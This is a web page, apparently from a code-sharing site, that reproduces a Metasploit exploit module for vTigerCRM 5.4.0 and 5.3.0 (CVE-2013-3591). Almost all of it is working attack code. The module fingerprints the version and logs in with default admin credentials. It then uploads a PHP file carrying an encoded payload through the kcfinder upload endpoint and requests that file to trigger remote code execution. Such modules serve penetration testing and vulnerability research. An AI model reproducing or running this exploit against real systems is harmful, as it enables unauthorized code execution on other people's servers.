扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 |
## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution', 'Description' => %q{ vTiger CRM allows an authenticated user to upload files to embed within documents. Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP script and execute aribtrary PHP code remotely. This module was tested against vTiger CRM v5.4.0 and v5.3.0. }, 'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' # Discovery / msf module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-3591'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats'] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Payload'=> { 'BadChars' => "&\n=+%", }, 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Oct 30 2013')) register_options( [ OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/']), OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']), OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']) ], self.class) end def check res = nil begin res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/index.php') }) rescue print_error("Unable to access the index.php file") return CheckCode::Unknown end if res and res.code != 200 print_error("Error accessing the index.php file") return CheckCode::Unknown end if res.body =~ /<div class="poweredBy">Powered by vtiger CRM - (.*)<\/div>/i print_status("vTiger CRM version: " + $1) case $1 when '5.4.0', '5.3.0' return CheckCode::Vulnerable else return CheckCode::Safe end end return CheckCode::Unknown end def exploit init = send_request_cgi({ 'method' => 'GET', 'uri' =>normalize_uri(target_uri.path, '/index.php') }) sess = init.get_cookies post = { 'module' => 'Users', 'action' => 'Authenticate', 'return_module' => 'Users', 'return_action' => 'Login', 'user_name' => datastore['USERNAME'], 'user_password' => datastore['PASSWORD'] } login = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/index.php'), 'vars_post' => post, 'cookie' => sess }) fname = rand_text_alphanumeric(rand(10)+6) + '.php3' cookies = login.get_cookies php = %Q|<?php #{payload.encoded} ?>| data = Rex::MIME::Message.new data.add_part(php, 'application/x-php', nil, "form-data; name=\"upload\"; filename=\"#{fname}\""); data.add_part('files', nil, nil, 'form-data; name="dir"') data_post = data.to_s res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, '/kcfinder/browse.php?type=files&lng=en&act=upload'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data_post, 'cookie' => cookies }) if res and res.code == 200 print_status("Triggering payload...") send_request_raw({'uri' => datastore["TARGETURI"] + "/test/upload/files/#{fname}"}, 5) end end end |
体验盒子
